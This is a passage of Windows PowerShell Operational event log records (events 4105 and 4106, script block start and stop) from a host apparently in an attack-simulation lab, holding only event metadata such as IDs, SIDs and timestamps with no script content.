Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477126
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477125
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477124
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477123
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477122
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477121
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477120
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477119
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477118
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477117
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477116
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477114
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477113
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477112
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477110
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477109
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477108
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477107
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477106
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477105
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477104
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477103
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477102
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477101
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477100
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477098
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477097
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477096
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477095
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477094
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477093
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477092
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477091
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477090
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477089
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477088
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477087
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477086
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477085
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477084
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477083
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477082
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477081
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477080
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477078
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477077
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477076
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477075
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477074
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477073
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477072
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
